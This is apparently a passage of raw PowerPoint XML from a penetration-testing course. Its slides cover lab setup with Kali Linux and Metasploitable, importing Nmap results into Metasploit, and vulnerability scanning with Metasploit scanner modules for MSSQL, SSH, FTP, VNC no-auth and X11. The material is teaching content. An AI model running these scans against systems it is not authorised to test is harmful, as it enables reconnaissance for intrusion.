        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4079221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2440-2A23-24DC-E56E-27F5910E7A30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37125" y="91022"/>
            <a:ext cx="6058875" cy="365126"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Installation material</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE1B5067-2650-ACC7-0457-2B1B3D8A85A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="85251" y="1985212"/>
            <a:ext cx="12427591" cy="3934326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download Course Material </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download VirtualBox </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install Windows 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install metasploitable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDAAA1D-5C77-3507-3E2C-81F992642E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7184948" y="3030353"/>
            <a:ext cx="4635800" cy="3836419"/>
            <a:chOff x="507" y="1182"/>
            <a:chExt cx="3091" cy="2558"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="AutoShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CDA46BC-BF70-74CF-FF63-585B3D894F8E}"/>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9" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88039EB1-E245-2F49-6C22-BD7D42CE1F04}"/>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0" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C1FCD1B-C6DB-7CC7-53D3-8817899DE1A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1" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4C87923-BB9C-2790-FBB0-97B23E6E4518}"/>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2" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCAB6F8F-AE21-494E-9D3A-97C339F7FBE7}"/>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DCE2D1E8-2D94-9C61-D5D5-F15D43C6A3B7}"/>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CA2EB3D-1ACA-853D-145C-EC8B1FE06117}"/>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ED3E455D-000B-CCAA-B9B2-D4316BB93B35}"/>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17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9496CDB9-9141-2401-AC84-9B74B9E0A8DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7402416" y="3217471"/>
            <a:ext cx="4265328" cy="2461257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4169442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0" y="0"/>
            <a:ext cx="8647244" cy="960950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Importing Nmap Results into Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0656860-5073-5ADB-1EAC-6AC551AE3ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622878" y="1179095"/>
            <a:ext cx="8521121" cy="3077766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db_export        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Export a file containing the contents of the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db_import        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Import a scan result file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db_nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Executes nmap and records the output automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2719368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624637" y="1441001"/>
            <a:ext cx="10942725" cy="3975998"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>V U L N E R A B I L I T Y  S C A N N I N G</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG"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8842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62D435-4874-76F6-82E2-3C5F37A5AACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="128914" y="4907"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Configured Microsoft SQL Servers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C0991F5-C0D4-69AF-ADA2-3E0685935705}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628073" y="1062182"/>
            <a:ext cx="2960811" cy="1231106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>use scanner/mssql/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>mssql_ping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>set RHOSTS &lt;HOST&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run Or Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4671555-B592-2427-E201-5B3FA0168AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212437" y="2699749"/>
            <a:ext cx="9319490" cy="1785104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>use scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>ssh_version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FTP Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>use scanner/ftp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>ftp_version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894F6F77-717F-49DA-EB37-150FAA4A11BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212437" y="4891314"/>
            <a:ext cx="2811988" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>VNC Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F07D4AF-EFC9-A83D-1FC2-09352F7C5E4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212437" y="5451663"/>
            <a:ext cx="4370940" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>use auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>vnc_none_auth</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342369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62D435-4874-76F6-82E2-3C5F37A5AACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="128914" y="4907"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" sz="2800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scanning for Open X11 Servers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4671555-B592-2427-E201-5B3FA0168AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040340" y="720191"/>
            <a:ext cx="9319490" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
